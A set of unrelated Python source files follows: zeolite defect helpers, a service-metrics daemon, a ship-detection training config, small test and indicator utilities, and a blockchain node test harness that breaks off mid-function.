# helper functions for second defect function
def find_removed_atoms(iz: ImperfectZeotype) -> List[int]:
"""
Finds the atoms removed from the iz by comparing it with parent MAZE-sim
:param iz: imperfect MAZE-sim to check for missing atoms
:return: list of indices of missing atoms (using parent indexing)
"""
missing_list = []
for atom in iz.parent_zeotype:
value = iz.index_mapper.get_index(iz.parent_zeotype.name, iz.name, atom.index)
if value is None:
missing_list.append(atom.index)
return missing_list
def find_neighbor_si(z: Zeotype, first_si_index: int):
"""
Finds the first neighboring Si
:param z: the MAZE-sim object
:param first_si_index: the first Si index to find a neighbor too
:return: the first neighboring si index
"""
z.update_nl()
for o_index in z.neighbor_list.get_neighbors(first_si_index)[0]:
for si_index in z.neighbor_list.get_neighbors(o_index)[0]:
if si_index == first_si_index:
continue
return si_index
def find_index_common_oxygen(iz, site_1: int, site_2: int) -> int:
"""
Finds a common oxygen, if it exists, between two T sites
:param iz: imperfect MAZE-sim (or subclass) containing T sites
:param site_1: index of T site 1
:param site_2: index of T site 2
:return:
"""
iz.update_nl()
nl1 = iz.neighbor_list.get_neighbors(site_1)[0]
nl2 = iz.neighbor_list.get_neighbors(site_2)[0]
# find common oxygen
for i in nl1:
if i in nl2:
if iz[i].symbol == 'O':
return i
assert False, 'No middle oxygen found!!'
def remove_two_T_sites(iz, site_1: int, site_2: int) -> ImperfectZeotype:
"""
Removes two T sites that are adjacent to eachother
:param iz: Impefect MAZE-sim with two T sites
:param site_1: the index of the first site to remove
:param site_2: the index of the second site to remove
:return:
"""
indices_to_remove = [site_1, site_2, find_index_common_oxygen(iz, site_1, site_2)]
return iz.delete_atoms(indices_to_remove)
def second_defect(od_dict, T_site_str, list_pos, cif_name, out_path, savefile: bool =True):
"""
Second defect creator
:param od_dict: dictionary of open defects (this is to allow it to integrate with the other code better)
:param T_site_str: The key for the open defects dictionary
:param list_pos: The position in the list of od_dict[T_site_str]
:param cif_name: the name of the cif file used to build the zeolite
:param out_path: the output path
:param savefile: bool if a file should be saved or not
:return: an open defect with an additional adjacent site removed
"""
od = od_dict[T_site_str][list_pos] # get specific open defect
complete_od = OpenDefect(od.parent_zeotype) # create an opendefect object without the removed index
removed_atom_index = find_removed_atoms(od)[0]
neighbor_si_index = find_neighbor_si(complete_od, removed_atom_index)
new_od = remove_two_T_sites(complete_od, removed_atom_index, neighbor_si_index).cap_atoms()
my_path = os.path.join(out_path, cif_name + '_' + str(neighbor_si_index) + '.traj')
if savefile:
write(my_path, new_od)
return new_od
# .add_atoms(Atoms('Ir', positions=[pos]), 'Ir')
# %%'
# %%
def insert_HM(cif_dir, out_path, cif_name, si_index):
atoms = read(cif_dir + str(si_index) + '.traj', '-1')
zeolite = Zeotype(atoms)
open_defect = OpenDefect(zeolite)
atoms_H = [a.index for a in open_defect if a.symbol in ['H']]
pos_H = open_defect.get_positions()[atoms_H]
cell_dim = atoms.get_cell_lengths_and_angles()[0:3]
for row in pos_H:
for index, item in enumerate(row):
if item >= cell_dim[index]:
item -= cell_dim[index]
row[index] = item
elif item < 0:
item += cell_dim[index]
row[index] = item
else:
continue
pos = np.mean(pos_H, axis=0)
new_od = open_defect.add_atoms(Atoms('Ir', positions=[pos]), 'Ir')
# my_path = os.path.join(out_path, cif_name + '_' + str(si_index) + '_Ir.traj')
# write(my_path, new_od)
return np.mean(pos)
def insert_HM_2(open_defect, si_index):
atoms_types, _ = open_defect.count_elements
atoms_H = atoms_types['H']
pos_H = open_defect.get_positions()[atoms_H]
cell_dim = open_defect.get_cell_lengths_and_angles()[0:3]
for row in pos_H:
for index, item in enumerate(row):
if item >= cell_dim[index]:
item -= cell_dim[index]
row[index] = item
elif item < 0:
item += cell_dim[index]
row[index] = item
else:
continue
pos = np.mean(pos_H, axis=0)
new_od = open_defect.add_atoms(Atoms('Ir', positions=[pos]), 'Ir')
return np.mean(pos)
if __name__ == "__main__":
#defect_maker('/Users/jiaweiguo/Desktop/0125Proposal/BEA.cif', 'BEA', '/Users/jiaweiguo/Desktop/0125Proposal')
od_dict = defect_maker('/data/BEA.cif', 'BEA', '//data/test_output',
savefiles=False)
my_od = second_defect(od_dict, 'T3', 3, 'BEA', '//data/test_output', savefile=False)
view(my_od)
# second_defect(cif_dir, out_path, 'BEA_T1_3', 189)
# second_defect(cif_dir, out_path, 'BEA_T1_3', 141)
# second_defect(cif_dir, out_path, 'BEA_T1_3', 177)
# cif_dir = '/Users/jiaweiguo/Desktop/0125Proposal/BEA/T1/BEA_T1_3.traj'
# out_path = '/Users/jiaweiguo/Desktop/0125Proposal/BEA/T1/'
# cif_dir = '/Users/jiaweiguo/Desktop/0125Proposal/BEA/T1/BEA_T1_3_'
# out_path = '/Users/jiaweiguo/Desktop/0125Proposal/BEA/T1/'
# insert_HM(cif_dir, out_path, 'BEA_T1_3', 141)
# insert_HM(cif_dir, out_path, 'BEA_T1_3', 189)
# insert_HM(cif_dir, out_path, 'BEA_T1_3', 177)
#
|
__version__ = '0.0.3'
from . import jws, command
load_jws = jws.load_jws
Jws = jws.Jws
|
#!/usr/bin/env python
import atexit
import ConfigParser
import datetime
import os
import sys
import time
from daemon import runner
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from modules.Models import Base, Metrics, Server, Service
from modules.ServiceStatus import ServiceStatus
class MetricsCollector():
def __init__(self, pid_file, db_path, config_file, poll_interval=60, debug=True):
self.stdin_path = '/dev/null'
if debug:
self.stdout_path = '/dev/tty'
self.stderr_path = '/dev/tty'
self.poll_interval = int(poll_interval/3)
else:
self.stdout_path = '/dev/null'
self.stderr_path = '/dev/null'
self.poll_interval = poll_interval
self.pidfile_timeout = 5
self.pidfile_path = pid_file
self.db_path = db_path
self.config_file = config_file
self.db_session = None
self.server = None
self.services = []
atexit.register(self.db_close)
def run(self):
try:
print "creating DB..."
# Initialise object to collect metrics
services_status = ServiceStatus()
# Connect to database
self.db_open(services_status.get_server_hostname())
# Hold off until configuration file created
print "Sleeping until configuration file found (%s)" % self.config_file
while True:
if os.path.isfile(self.config_file):
break
else:
time.sleep(self.poll_interval)
print "Configuration file found, polling.."
# First metrics poll to instantiate system information
while True:
# Poll and store
dt = datetime.datetime.utcnow()
services = self.get_services(self.config_file)
data = services_status.poll_metrics(services)
self.store_status(dt, data)
time.sleep(self.poll_interval)
except Exception, e:
print "Collector error: %s" % e
def db_open(self, hostname='localhost'):
engine = create_engine('sqlite:///'+self.db_path)
Base.metadata.bind = engine
Base.metadata.create_all(engine)
DBSession = sessionmaker(bind=engine)
self.db_session = DBSession()
self.server = Server(hostname=hostname)
self.db_session.add(self.server)
self.db_session.commit()
def db_close(self):
if self.db_session:
self.db_session.close()
def db_rollback(self):
self.db_session.rollback()
def get_services(self, config_file):
services = list()
try:
config = ConfigParser.ConfigParser()
config.read(config_file)
if 'services' in config.sections():
for service in config.items('services'):
name = service[0]
url = service[1]
services.append({'name': name, 'url': url})
return services
except Exception, e:
print "Exception while reading services from configuration: %s" % e
return False
def get_services_last2hours(self):
try:
now = datetime.datetime.utcnow()
last_2_hours = now - datetime.timedelta(hours=2)
self.services = self.db_session.query(Service).filter_by(server=self.server).filter(Service.timestamp >= last_2_hours.strftime('%s')).order_by(Service.id)
except Exception:
print "Error accessing services status"
def store_status(self, date_time, data):
try:
for service in data:
service_status = Metrics(timestamp=date_time.strftime('%s'),
latency=data[service].get('latency', -1),
available=data[service].get('reachable'),
service_name=service)
self.db_session.add(service_status)
self.db_session.commit()
except Exception, e:
print "Error storing services status: %s" % e
finally:
self.db_close()
def is_running(pid_file):
try:
with file(pid_file, 'r') as pf:
pid = int(pf.read().strip())
except IOError:
pid = None
except SystemExit:
pid = None
if pid:
return True, pid
else:
return False, -1
# Main
SCRIPT_PATH = os.path.abspath(os.path.dirname(__file__))
DB_FILE = SCRIPT_PATH + '/data/metrics.sqlite3'
CFG_FILE = SCRIPT_PATH + '/config/settings.cfg'
PID_FILE = SCRIPT_PATH + '/.__PACKAGE_NAME__-collector.pid'
POLL_INTERVAL = 30
DEBUG = False
if __name__ == "__main__":
if len(sys.argv) == 3:
DEBUG = True
if len(sys.argv) >= 2:
if 'status' == sys.argv[1]:
running, pid = is_running(PID_FILE)
if running:
print '%s is running as pid %s' % (sys.argv[0], pid)
else:
print '%s is not running.' % sys.argv[0]
elif 'stop' == sys.argv[1] and not is_running(PID_FILE)[0]:
print '%s is not running.' % sys.argv[0]
else:
collector = MetricsCollector(PID_FILE, DB_FILE, CFG_FILE, poll_interval=POLL_INTERVAL, debug=DEBUG)
daemon = runner.DaemonRunner(collector)
daemon.do_action() # start|stop|restart as sys.argv[1]
running, pid = is_running(PID_FILE)
sys.exit(0)
else:
print "Usage: %s start|stop|restart|status" % sys.argv[0]
sys.exit(2)
else:
print "%s can't be included in another program." % sys.argv[0]
sys.exit(1)
|
dataset_type = 'ShipRSImageNet_Level3'
# data_root = 'data/Ship_ImageNet/'
data_root = './data/ShipRSImageNet/'
CLASSES = ('Other Ship', 'Other Warship', 'Submarine', 'Other Aircraft Carrier', 'Enterprise', 'Nimitz', 'Midway','Ticonderoga',
'Other Destroyer', 'Atago DD', 'Arleigh Burke DD', 'Hatsuyuki DD', 'Hyuga DD','Asagiri DD', 'Other Frigate', 'Perry FF',
'Patrol', 'Other Landing', 'YuTing LL','YuDeng LL', 'YuDao LL', 'YuZhao LL', 'Austin LL', 'Osumi LL',
'Wasp LL','LSD 41 LL', 'LHA LL', 'Commander', 'Other Auxiliary Ship', 'Medical Ship', 'Test Ship', 'Training Ship',
'AOE', 'Masyuu AS', 'Sanantonio AS', 'EPF', 'Other Merchant', 'Container Ship', 'RoRo', 'Cargo',
'Barge', 'Tugboat', 'Ferry', 'Yacht', 'Sailboat', 'Fishing Vessel', 'Oil Tanker', 'Hovercraft',
'Motorboat','Dock',)
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True, with_mask=True),
# dict(type='Resize', img_scale=(1333, 800), keep_ratio=True),
dict(type='Resize', img_scale=(1333, 800), keep_ratio=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels', 'gt_masks']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
# img_scale=(1333, 800),
img_scale=(1333, 800),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
samples_per_gpu=8,
workers_per_gpu=2,
train=dict(
type=dataset_type,
classes=CLASSES,
ann_file=data_root + 'COCO_Format/ShipRSImageNet_bbox_train_level_3.json',
img_prefix=data_root + 'VOC_Format/JPEGImages/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
classes=CLASSES,
ann_file=data_root + 'COCO_Format/ShipRSImageNet_bbox_val_level_3.json',
img_prefix=data_root + 'VOC_Format/JPEGImages/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
classes=CLASSES,
ann_file=data_root + 'COCO_Format/ShipRSImageNet_bbox_val_level_3.json',
img_prefix=data_root + 'VOC_Format/JPEGImages/',
pipeline=test_pipeline))
evaluation = dict(interval=10, metric=['bbox', 'segm'])
|
from .assert_equal import assert_equal, EqualAssertionError
from collections.abc import Iterable
def is_iterable(v):
return isinstance(v, Iterable)
def iterables_equal(iterable1, iterable2):
return iterable1 == iterable2 or (
is_iterable(iterable1)
and is_iterable(iterable2)
and all(map(iterables_equal, iterable1, iterable2))
)
def assert_iterables_equal(actual_iterable, expected_iterable):
if not iterables_equal(actual_iterable, expected_iterable):
raise EqualAssertionError(actual_iterable, expected_iterable)
|
from typing import Union
import numpy as np
import talib
from jesse.helpers import get_candle_source
def ht_trendmode(candles: np.ndarray, source_type: str = "close", sequential: bool = False) -> Union[float, np.ndarray]:
"""
HT_TRENDMODE - Hilbert Transform - Trend vs Cycle Mode
:param candles: np.ndarray
:param source_type: str - default: "close"
:param sequential: bool - default=False
:return: int | np.ndarray
"""
if not sequential and len(candles) > 240:
candles = candles[-240:]
source = get_candle_source(candles, source_type=source_type)
res = talib.HT_TRENDMODE(source)
return res if sequential else res[-1]
|
import decimal
import subprocess
import time
import os
import re
import datetime
import json
from core_symbol import CORE_SYMBOL
from testUtils import Utils
from testUtils import Account
# pylint: disable=too-many-public-methods
class Node(object):
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-arguments
def __init__(self, host, port, pid=None, cmd=None, enableMongo=False, mongoHost="localhost", mongoPort=27017, mongoDb="ENUtest"):
self.host=host
self.port=port
self.pid=pid
self.cmd=cmd
self.killed=False # marks node as killed
self.enableMongo=enableMongo
self.mongoHost=mongoHost
self.mongoPort=mongoPort
self.mongoDb=mongoDb
self.endpointArgs="--url http://%s:%d" % (self.host, self.port)
self.mongoEndpointArgs=""
if self.enableMongo:
self.mongoEndpointArgs += "--host %s --port %d %s" % (mongoHost, mongoPort, mongoDb)
def __str__(self):
#return "Host: %s, Port:%d, Pid:%s, Cmd:\"%s\"" % (self.host, self.port, self.pid, self.cmd)
return "Host: %s, Port:%d" % (self.host, self.port)
@staticmethod
def validateTransaction(trans):
assert trans
assert isinstance(trans, dict), print("Input type is %s" % type(trans))
def printTrans(trans):
Utils.Print("ERROR: Failure in transaction validation.")
Utils.Print("Transaction: %s" % (json.dumps(trans, indent=1)))
assert trans["processed"]["receipt"]["status"] == "executed", printTrans(trans)
@staticmethod
def stdinAndCheckOutput(cmd, subcommand):
"""Passes input to stdin, executes cmd. Returns tuple with return code(int), stdout(byte stream) and stderr(byte stream)."""
assert(cmd)
assert(isinstance(cmd, list))
assert(subcommand)
assert(isinstance(subcommand, str))
outs=None
errs=None
ret=0
try:
popen=subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
outs,errs=popen.communicate(input=subcommand.encode("utf-8"))
ret=popen.wait()
except subprocess.CalledProcessError as ex:
msg=ex.output
return (ex.returncode, msg, None)
return (ret, outs, errs)
@staticmethod
def normalizeJsonObject(extJStr):
tmpStr=extJStr
tmpStr=re.sub(r'ObjectId\("(\w+)"\)', r'"ObjectId-\1"', tmpStr)
tmpStr=re.sub(r'ISODate\("([\w|\-|\:|\.]+)"\)', r'"ISODate-\1"', tmpStr)
tmpStr=re.sub(r'NumberLong\("(\w+)"\)', r'"NumberLong-\1"', tmpStr)
return tmpStr
@staticmethod
def runMongoCmdReturnJson(cmd, subcommand, trace=False):
"""Run mongodb subcommand and return response."""
assert(cmd)
assert(isinstance(cmd, list))
assert(subcommand)
assert(isinstance(subcommand, str))
retId,outs,errs=Node.stdinAndCheckOutput(cmd, subcommand)
if retId is not 0:
Utils.Print("ERROR: mongodb call failed. %s" % (errs))
return None
outStr=Node.byteArrToStr(outs)
if not outStr:
return None
extJStr=Utils.filterJsonObject(outStr)
if not extJStr:
return None
jStr=Node.normalizeJsonObject(extJStr)
if not jStr:
return None
if trace: Utils.Print ("RAW > %s"% (outStr))
if trace: Utils.Print ("JSON> %s"% jStr)
try:
jsonData=json.loads(jStr)
except json.decoder.JSONDecodeError as _:
Utils.Print ("ERROR: JSONDecodeError")
Utils.Print ("Raw MongoDB response: > %s"% (outStr))
Utils.Print ("Normalized MongoDB response: > %s"% (jStr))
raise
return jsonData
@staticmethod
def getTransId(trans):
"""Retrieve transaction id from dictionary object."""
assert trans
assert isinstance(trans, dict), print("Input type is %s" % type(trans))
#Utils.Print("%s" % trans)
transId=trans["transaction_id"]
return transId
@staticmethod
def byteArrToStr(arr):
return arr.decode("utf-8")
def setWalletEndpointArgs(self, args):
self.endpointArgs="--url http://%s:%d %s" % (self.host, self.port, args)
def validateAccounts(self, accounts):
assert(accounts)
assert(isinstance(accounts, list))
for account in accounts:
assert(account)
assert(isinstance(account, Account))
if Utils.Debug: Utils.Print("Validating account %s" % (account.name))
accountInfo=self.getEnuAccount(account.name)
try:
assert(accountInfo)
if not self.enableMongo:
assert(accountInfo["account_name"] == account.name)
else:
assert(accountInfo["name"] == account.name)
except (AssertionError, TypeError, KeyError) as _:
Utils.Print("account validation failed. account: %s" % (account.name))
raise
# pylint: disable=too-many-branches
def getBlock(self, blockNum, silentErrors=False):
"""Given a blockId will return block details."""
assert(isinstance(blockNum, int))
if not self.enableMongo:
cmd="%s %s get block %d" % (Utils.EnuClientPath, self.endpointArgs, blockNum)
if Utils.Debug: Utils.Print("cmd: %s" % (cmd))
try:
block=Utils.runCmdReturnJson(cmd)
return block
except subprocess.CalledProcessError as ex:
if not silentErrors:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during get block. %s" % (msg))
return None
else:
cmd="%s %s" % (Utils.MongoPath, self.mongoEndpointArgs)
subcommand='db.blocks.findOne( { "block_num": %d } )' % (blockNum)
if Utils.Debug: Utils.Print("cmd: echo '%s' | %s" % (subcommand, cmd))
try:
block=Node.runMongoCmdReturnJson(cmd.split(), subcommand)
if block is not None:
return block
except subprocess.CalledProcessError as ex:
if not silentErrors:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during get db node get block. %s" % (msg))
return None
return None
def getBlockById(self, blockId, silentErrors=False):
cmd="%s %s" % (Utils.MongoPath, self.mongoEndpointArgs)
subcommand='db.blocks.findOne( { "block_id": "%s" } )' % (blockId)
if Utils.Debug: Utils.Print("cmd: echo '%s' | %s" % (subcommand, cmd))
try:
trans=Node.runMongoCmdReturnJson(cmd.split(), subcommand)
if trans is not None:
return trans
except subprocess.CalledProcessError as ex:
if not silentErrors:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during db get block by id. %s" % (msg))
return None
return None
def isBlockPresent(self, blockNum):
"""Does node have head_block_num >= blockNum"""
assert isinstance(blockNum, int)
assert (blockNum > 0)
info=self.getInfo(silentErrors=True)
assert(info)
node_block_num=0
try:
node_block_num=int(info["head_block_num"])
except (TypeError, KeyError) as _:
Utils.Print("Failure in get info parsing. %s" % (info))
raise
return True if blockNum <= node_block_num else False
def isBlockFinalized(self, blockNum):
"""Is blockNum finalized"""
assert(blockNum)
assert isinstance(blockNum, int)
assert (blockNum > 0)
info=self.getInfo(silentErrors=True)
assert(info)
node_block_num=0
try:
node_block_num=int(info["last_irreversible_block_num"])
except (TypeError, KeyError) as _:
Utils.Print("Failure in get info parsing. %s" % (info))
raise
finalized = True if blockNum <= node_block_num else False
if Utils.Debug:
if finalized:
Utils.Print("Block %d is finalized." % (blockNum))
else:
Utils.Print("Block %d is not yet finalized." % (blockNum))
return finalized
# pylint: disable=too-many-branches
def getTransaction(self, transId, silentErrors=False):
if not self.enableMongo:
cmd="%s %s get transaction %s" % (Utils.EnuClientPath, self.endpointArgs, transId)
if Utils.Debug: Utils.Print("cmd: %s" % (cmd))
try:
trans=Utils.runCmdReturnJson(cmd)
return trans
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
if "Failed to connect" in msg:
Utils.Print("ERROR: Node is unreachable. %s" % (msg))
raise
if not silentErrors:
Utils.Print("ERROR: Exception during transaction retrieval. %s" % (msg))
return None
else:
return self.getTransactionMdb(transId, silentErrors)
return None
def getTransactionMdb(self, transId, silentErrors=False):
"""Get transaction from MongoDB. Since DB only contains finalized blocks, transactions can take a while to appear in DB."""
cmd="%s %s" % (Utils.MongoPath, self.mongoEndpointArgs)
#subcommand='db.Transactions.findOne( { $and : [ { "trx_id": "%s" }, {"irreversible":true} ] } )' % (transId)
subcommand='db.transactions.findOne( { "trx_id": "%s" } )' % (transId)
if Utils.Debug: Utils.Print("cmd: echo '%s' | %s" % (subcommand, cmd))
try:
trans=Node.runMongoCmdReturnJson(cmd.split(), subcommand)
return trans
except subprocess.CalledProcessError as ex:
if not silentErrors:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during get db node get trans. %s" % (msg))
return None
def isTransInBlock(self, transId, blockId):
"""Check if transId is within block identified by blockId"""
assert(transId)
assert(isinstance(transId, str))
assert(blockId)
assert(isinstance(blockId, int))
block=self.getBlock(blockId)
assert(block)
transactions=None
key=""
try:
if not self.enableMongo:
key="[transactions]"
transactions=block["transactions"]
else:
key="[blocks][transactions]"
transactions=block["block"]["transactions"]
except (AssertionError, TypeError, KeyError) as _:
Utils.Print("block%s not found. Block: %s" % (key,block))
raise
if transactions is not None:
for trans in transactions:
assert(trans)
try:
myTransId=trans["trx"]["id"]
if transId == myTransId:
return True
except (TypeError, KeyError) as _:
Utils.Print("transaction%s not found. Transaction: %s" % (key, trans))
return False
def getBlockIdByTransId(self, transId):
"""Given a transaction Id (string), will return block id (int) containing the transaction"""
assert(transId)
assert(isinstance(transId, str))
trans=self.getTransaction(transId)
if trans is None:
return None
refBlockNum=None
key=""
try:
if not self.enableMongo:
key="[trx][trx][ref_block_num]"
refBlockNum=trans["trx"]["trx"]["ref_block_num"]
else:
key="[transaction_header][ref_block_num]"
refBlockNum=trans["transaction_header"]["ref_block_num"]
refBlockNum=int(refBlockNum)+1
except (TypeError, ValueError, KeyError) as _:
Utils.Print("transaction%s not found. Transaction: %s" % (key, trans))
return None
headBlockNum=self.getHeadBlockNum()
assert(headBlockNum)
try:
headBlockNum=int(headBlockNum)
except(ValueError) as _:
Utils.Print("ERROR: Block info parsing failed. %s" % (headBlockNum))
raise
if Utils.Debug: Utils.Print("Reference block num %d, Head block num: %d" % (refBlockNum, headBlockNum))
for blockNum in range(refBlockNum, headBlockNum+1):
if self.isTransInBlock(str(transId), blockNum):
if Utils.Debug: Utils.Print("Found transaction %s in block %d" % (transId, blockNum))
return blockNum
return None
def getBlockIdByTransIdMdb(self, transId):
"""Given a transaction Id (string), will return block id (int) containing the transaction. This is specific to MongoDB."""
assert(transId)
assert(isinstance(transId, str))
trans=self.getTransactionMdb(transId)
if not trans: return None
refBlockNum=None
try:
refBlockNum=trans["transaction_header"]["ref_block_num"]
refBlockNum=int(refBlockNum)+1
except (TypeError, ValueError, KeyError) as _:
Utils.Print("transaction[transaction_header][ref_block_num] not found. Transaction: %s" % (trans))
return None
headBlockNum=self.getHeadBlockNum()
assert(headBlockNum)
try:
headBlockNum=int(headBlockNum)
except(ValueError) as _:
Utils.Print("Info parsing failed. %s" % (headBlockNum))
for blockNum in range(refBlockNum, headBlockNum+1):
if self.isTransInBlock(str(transId), blockNum):
return blockNum
return None
def isTransInAnyBlock(self, transId):
"""Check if transaction (transId) is in a block."""
assert(transId)
assert(isinstance(transId, (str,int)))
# if not self.enableMongo:
blockId=self.getBlockIdByTransId(transId)
# else:
# blockId=self.getBlockIdByTransIdMdb(transId)
return True if blockId else False
def isTransFinalized(self, transId):
"""Check if transaction (transId) has been finalized."""
assert(transId)
assert(isinstance(transId, str))
blockId=self.getBlockIdByTransId(transId)
if not blockId:
return False
assert(isinstance(blockId, int))
return self.isBlockFinalized(blockId)
# Create & initialize account and return creation transactions. Return transaction json object
def createInitializeAccount(self, account, creatorAccount, stakedDeposit=1000, waitForTransBlock=False, stakeNet=100, stakeCPU=100, buyRAM=100):
cmd='%s %s system newaccount -j %s %s %s %s --stake-net "%s %s" --stake-cpu "%s %s" --buy-ram "%s %s"' % (
Utils.EnuClientPath, self.endpointArgs, creatorAccount.name, account.name,
account.ownerPublicKey, account.activePublicKey,
stakeNet, CORE_SYMBOL, stakeCPU, CORE_SYMBOL, buyRAM, CORE_SYMBOL)
if Utils.Debug: Utils.Print("cmd: %s" % (cmd))
trans=None
try:
trans=Utils.runCmdReturnJson(cmd)
transId=Node.getTransId(trans)
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during account creation. %s" % (msg))
return None
if stakedDeposit > 0:
self.waitForTransInBlock(transId) # seems like account creation needs to be finalized before transfer can happen
trans = self.transferFunds(creatorAccount, account, Node.currencyIntToStr(stakedDeposit, CORE_SYMBOL), "init")
transId=Node.getTransId(trans)
if waitForTransBlock and not self.waitForTransInBlock(transId):
return None
return trans
def createAccount(self, account, creatorAccount, stakedDeposit=1000, waitForTransBlock=False):
"""Create account and return creation transactions. Return transaction json object.
waitForTransBlock: wait on creation transaction id to appear in a block."""
cmd="%s %s create account -j %s %s %s %s" % (
Utils.EnuClientPath, self.endpointArgs, creatorAccount.name, account.name,
account.ownerPublicKey, account.activePublicKey)
if Utils.Debug: Utils.Print("cmd: %s" % (cmd))
trans=None
try:
trans=Utils.runCmdReturnJson(cmd)
transId=Node.getTransId(trans)
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during account creation. %s" % (msg))
return None
if stakedDeposit > 0:
self.waitForTransInBlock(transId) # seems like account creation needs to be finlized before transfer can happen
trans = self.transferFunds(creatorAccount, account, "%0.04f %s" % (stakedDeposit/10000, CORE_SYMBOL), "init")
transId=Node.getTransId(trans)
if waitForTransBlock and not self.waitForTransInBlock(transId):
return None
return trans
def getEnuAccount(self, name):
assert(isinstance(name, str))
if not self.enableMongo:
cmd="%s %s get account -j %s" % (Utils.EnuClientPath, self.endpointArgs, name)
if Utils.Debug: Utils.Print("cmd: %s" % (cmd))
try:
trans=Utils.runCmdReturnJson(cmd)
return trans
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during get account. %s" % (msg))
return None
else:
return self.getEnuAccountFromDb(name)
def getEnuAccountFromDb(self, name):
cmd="%s %s" % (Utils.MongoPath, self.mongoEndpointArgs)
subcommand='db.accounts.findOne({"name" : "%s"})' % (name)
if Utils.Debug: Utils.Print("cmd: echo '%s' | %s" % (subcommand, cmd))
try:
trans=Node.runMongoCmdReturnJson(cmd.split(), subcommand)
return trans
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during get account from db. %s" % (msg))
return None
def getTable(self, contract, scope, table):
cmd="%s %s get table %s %s %s" % (Utils.EnuClientPath, self.endpointArgs, contract, scope, table)
if Utils.Debug: Utils.Print("cmd: %s" % (cmd))
try:
trans=Utils.runCmdReturnJson(cmd)
return trans
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during table retrieval. %s" % (msg))
return None
def getTableAccountBalance(self, contract, scope):
assert(isinstance(contract, str))
assert(isinstance(scope, str))
table="accounts"
trans = self.getTable(contract, scope, table)
assert(trans)
try:
return trans["rows"][0]["balance"]
except (TypeError, KeyError) as _:
print("transaction[rows][0][balance] not found. Transaction: %s" % (trans))
raise
def getCurrencyBalance(self, contract, account, symbol=CORE_SYMBOL):
"""returns raw output from get currency balance e.g. '99999.9950 CUR'"""
assert(contract)
assert(isinstance(contract, str))
assert(account)
assert(isinstance(account, str))
assert(symbol)
assert(isinstance(symbol, str))
cmd="%s %s get currency balance %s %s %s" % (Utils.EnuClientPath, self.endpointArgs, contract, account, symbol)
if Utils.Debug: Utils.Print("cmd: %s" % (cmd))
try:
trans=Utils.runCmdReturnStr(cmd)
return trans
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during get currency stats. %s" % (msg))
return None
def getCurrencyStats(self, contract, symbol=CORE_SYMBOL):
"""returns Json output from get currency stats."""
assert(contract)
assert(isinstance(contract, str))
assert(symbol)
assert(isinstance(symbol, str))
cmd="%s %s get currency stats %s %s" % (Utils.EnuClientPath, self.endpointArgs, contract, symbol)
if Utils.Debug: Utils.Print("cmd: %s" % (cmd))
try:
trans=Utils.runCmdReturnJson(cmd)
return trans
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during get currency stats. %s" % (msg))
return None
# Verifies account. Returns "get account" json return object
def verifyAccount(self, account):
assert(account)
if not self.enableMongo:
ret=self.getEnuAccount(account.name)
if ret is not None:
account_name=ret["account_name"]
if account_name is None:
Utils.Print("ERROR: Failed to verify account creation.", account.name)
return None
return ret
else:
return self.verifyAccountMdb(account)
def verifyAccountMdb(self, account):
assert(account)
ret=self.getEnuAccountFromDb(account.name)
if ret is not None:
account_name=ret["name"]
if account_name is None:
Utils.Print("ERROR: Failed to verify account creation.", account.name)
return None
return ret
return None
def waitForTransInBlock(self, transId, timeout=None):
"""Wait for trans id to be finalized."""
assert(isinstance(transId, str))
lam = lambda: self.isTransInAnyBlock(transId)
ret=Utils.waitForBool(lam, timeout)
return ret
def waitForTransFinalization(self, transId, timeout=None):
"""Wait for trans id to be finalized."""
assert(isinstance(transId, str))
lam = lambda: self.isTransFinalized(transId)
ret=Utils.waitForBool(lam, timeout)
return ret
def waitForNextBlock(self, timeout=None):
num=self.getHeadBlockNum()
lam = lambda: self.getHeadBlockNum() > num
ret=Utils.waitForBool(lam, timeout)
return ret
def waitForBlock(self, blockNum, timeout=None):
lam = lambda: self.getHeadBlockNum() > blockNum
ret=Utils.waitForBool(lam, timeout)
return ret
def waitForIrreversibleBlock(self, blockNum, timeout=None):
lam = lambda: self.getIrreversibleBlockNum() >= blockNum
ret=Utils.waitForBool(lam, timeout)
return ret
# Trasfer funds. Returns "transfer" json return object
def transferFunds(self, source, destination, amountStr, memo="memo", force=False, waitForTransBlock=False):
assert isinstance(amountStr, str)
assert(source)
assert(isinstance(source, Account))
assert(destination)
assert(isinstance(destination, Account))
cmd="%s %s -v transfer -j %s %s" % (
Utils.EnuClientPath, self.endpointArgs, source.name, destination.name)
cmdArr=cmd.split()
cmdArr.append(amountStr)
cmdArr.append(memo)
if force:
cmdArr.append("-f")
s=" ".join(cmdArr)
